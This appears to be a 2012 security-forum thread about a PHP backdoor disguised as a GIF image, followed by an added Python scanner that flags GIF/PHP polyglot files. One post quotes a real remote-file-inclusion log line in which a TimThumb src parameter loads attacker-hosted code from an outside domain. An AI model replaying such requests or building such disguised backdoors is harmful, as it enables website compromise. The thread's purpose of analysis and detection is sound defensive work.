Topic: Backdoor php not detected?

polonus
Backdoor php not detected?
« on: February 09, 2012, 10:55:04 PM »
See: https://www.virustotal.com/url/801e01b1e0757edcb07201e4fd4b35fe927a23c7b75a320a22b8da015ec19cd0/analysis/1328823773/
and
http://vscan.urlvoid.com/analysis/f42e63123f17e6692ff5bb67ed793aad/amFtaWxhLXBocA==/
RFI malware listed at critical security as -196.36.89.12,09/Feb/2012:03:20:03 +0100,hxxp://picasa.com.dk-cell.com.mx/jamila.php,/misc//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=hxxp://picasa.com.dk-cell.com.mx/jamila.php HTTP/1.1
See: -http://jsunpack.jeek.org/?report=6bd6e499bead9eab1736f5529a27c2fb0ddca085 (Go to the last mentioned link only if security savvy, with ample script protection and in a VM.)
Random vulnerability. For a description see: http://www.metod.si/random-vulnerability-disected/ (link from SimpleFolia, article author razno). It has obfuscated PHP code behind the binary data in a file that initially tries to disguise itself as a GIF image (GIF89a).

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

!Donovan
Re: Backdoor php not detected?
« Reply #2 on: February 09, 2012, 11:51:52 PM »
And with this malware, there is use of "End Of Transmission" as well as many other abnormal hex values for a website. See the complete list attached.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

polonus
Re: Backdoor php not detected?
« Reply #3 on: February 10, 2012, 12:11:14 AM »
Hi Donovansrb10,

The EOT there is marking the end of the GIF data source file, separating it from the PHP backdoor code part.
That is why I run the webbug detector extension in Google Chrome, to be aware of webbugs on a page, but normally webbugs are not infected via RFI.
Inside the code we find -> $lol is $_GET['lol']; <- (is equals =, pol). Lots of this particular RFI can be found via RFI logs.

polonus
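The file layout described in the first post and in reply #3 (a GIF89a header, image-looking bytes, an End-Of-Transmission byte, then PHP) can be checked for on a web server without executing anything. The script below is an added example written for this thread, not code from the forum or from the malware sample; the sample bytes are constructed, and the scan function and path names are assumptions.

```python
import re
from pathlib import Path

# Magic bytes every real GIF starts with (GIF87a or GIF89a).
GIF_MAGIC = (b"GIF87a", b"GIF89a")
# PHP open tags; a genuine image has no reason to contain one.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
EOT = b"\x04"  # the "End Of Transmission" byte mentioned in the thread


def scan_bytes(data: bytes) -> dict:
    """Classify one file body: does it claim to be a GIF, and does PHP follow?"""
    claims_gif = data.startswith(GIF_MAGIC)
    m = PHP_TAG.search(data)
    php_offset = m.start() if m else None
    eot_before_php = php_offset is not None and EOT in data[:php_offset]
    return {
        "claims_gif": claims_gif,
        "php_offset": php_offset,          # where the PHP tag starts, if any
        "eot_before_php": eot_before_php,  # separator pattern from reply #3
        "suspicious": claims_gif and php_offset is not None,
    }


def scan_tree(root: str, suffixes=(".gif", ".jpg", ".png", ".php")) -> list:
    """Walk an upload or plugin directory (hypothetical path) and list GIF/PHP polyglots."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            r = scan_bytes(p.read_bytes())
            if r["suspicious"]:
                hits.append((str(p), r["php_offset"]))
    return hits


# Constructed sample, not the real file: GIF89a header, a few image-looking
# bytes, the 0x04 separator, then the PHP fragment quoted in reply #3.
SAMPLE_POLYGLOT = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    + EOT
    + b"<?php $lol = $_GET['lol']; ?>"
)
# A constructed clean GIF of the same shape, ending with the GIF trailer byte.
SAMPLE_CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;"

if __name__ == "__main__":
    print(scan_bytes(SAMPLE_POLYGLOT))
    print(scan_bytes(SAMPLE_CLEAN_GIF))
```

Run `scan_tree("/path/to/wp-content")` against a copy of the web root; any hit is a file that presents as an image but carries PHP after the image data.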